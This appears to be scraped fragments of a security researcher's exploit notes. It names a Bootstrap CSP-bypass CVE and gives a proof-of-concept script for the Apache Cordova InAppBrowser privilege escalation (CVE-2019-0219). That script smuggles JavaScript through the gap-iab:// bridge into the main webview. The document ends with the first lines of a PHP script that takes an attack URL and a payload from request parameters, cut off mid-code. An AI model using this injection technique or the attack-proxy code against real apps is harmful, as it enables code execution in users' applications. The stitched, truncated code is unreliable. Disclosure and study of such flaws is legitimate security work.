Sergey Bobrov BlackFan

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();

Apache Cordova InAppBrowser Privilege Escalation

CVE-2019-0219

<script>
alert('InAppBrowser alert \n window.cordova = ' + JSON.stringify(window.cordova));

prompt("","gap-iab://InAppBrowser'-alert('MainWebview alert \\n window.cordova = ' + JSON.stringify(window.cordova))-'")
</script>

	<?php
	$attack_url = $_GET['url'];
	$payload = $_GET['payload'];

	$ch = curl_init();

	if(isset($_SERVER['HTTP_ACCEPT'])) {
	$headers[] = 'Accept: '.$_SERVER['HTTP_ACCEPT'];
	}